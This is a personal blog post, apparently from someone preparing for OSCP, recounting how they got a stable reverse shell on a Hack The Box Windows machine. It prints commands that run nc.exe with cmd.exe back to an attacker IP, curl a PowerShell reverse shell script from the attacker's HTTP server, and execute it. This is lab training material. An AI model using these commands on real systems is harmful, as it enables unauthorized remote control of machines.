Learned something new about reverse shells this weekend

I've been working on more Windows boxes lately as part of my OSCP preparation. It's no secret to any of my friends who know me personally that I'm not a big fan of working on Windows. Tough luck. Have to learn.

Anyway, Windows doesn't typically have cool apps like Netcat and SSH. At least not right out of the box last time I checked. I usually have to Google my way though things that work.

Anyway, I got past that part and was stuck trying to get a reverse shell working on a Windows machine. I can only vaguely talk about it right now since it's not a retired machine on HTB yet. I'll do my best without giving too many details.

I had a Python script that gave me remote code execution, but I was only able to run a single command at a time and view the output in my terminal. When I attempted to execute Netcat, my reverse shell failed. It connected for a brief second then dropped. This was pretty frustrating.

It looked something like this:

Exploit Command on box with Netcat Windows Binary

Nux@KakaLinpoop:~/Documents/htb/boxes/BoxNameRemoved python sploit.py -i http://<TargetIP> -u (usernameRemoved) -p (PasswordRemoved) -c powershell.exe -a '-NoProfile -Command /Users/Public/nc.exe -e /Windows/system32/cmd.exe 10.10.14.26 443'

My Box Attempting to Catch the Shell

nux@KakaLinpoop:~/Documents/htb/boxes/remote/nmap$ nlis443
listening on [any] 443 ...
connect to [10.10.14.26] from (UNKNOWN) [10.10.10.180] 49780

I'd get a connect message, and it would immediately drop. I was attempting to use PowerShell to execute Netcat. It was almost working, as you can see I got a message saying it had connected. However, it immediately dropped after that. Sucks, yo!

Then I got a new idea

I decided to try something else. I had no idea if it would work, but I felt it was worth a shot. Rather than trying to execute a command to create a reverse shell, I'd drop a reverse shell script on the machine and execute the script. Sounds similar, but it's a very different approach, because I'm no longer having to embed a bunch of command arguments in my exploit attempt. I'd just have to execute the reverse shell script and it would handle the specifics.

I grabbed this PowerShell reverse shell one-liner: https://gist.github.com/egre55/c058744a4240af6515eb32b2d33fbed3

Then I adjusted it for my needs, changing the port and IP assignements, then saving it as "meow.ps1."

From there, I curled it to my target machine from my Python Simple HTTP Server and executed the script while having my listener going. It worked!

It looks something like below.

With Python Simple HTTP Server running and hosting the file

nux@KakaLinpoop:~/Documents/htb/boxes/BoxNameRemoved$ python sploit.py -i http://10.10.10.180 -u (usernameRemoved) -p (PasswordRemoved) -c curl -a 'http://10.10.14.26/meow.ps1 -o /Users/Public/meow.ps1'

With my Netcat listener on my Kali VM

nux@KakaLinpoop:~/Documents/htb/boxes/BoxNameRemoved$ python sploit.py -i http://10.10.10.180 -u (usernameRemoved) -p (passwordRemoved) -c powershell.exe -a '-Command /Users/Public/meow.ps1'

See? The difference here is that I didn't have to attempt to add the port and IP arguments in the exploit. Instead, I dropped a script on the machine and just used PowerShell to execute the script. This led to a functional reverse shell.

Lesson Learned

Sometimes, you can't just get a reverse shell working right off the bat. You may have to run a couple of commands to make it work properly. This may be useful for those times you are attempting to set up a reverse shell and can't get it to stay connected.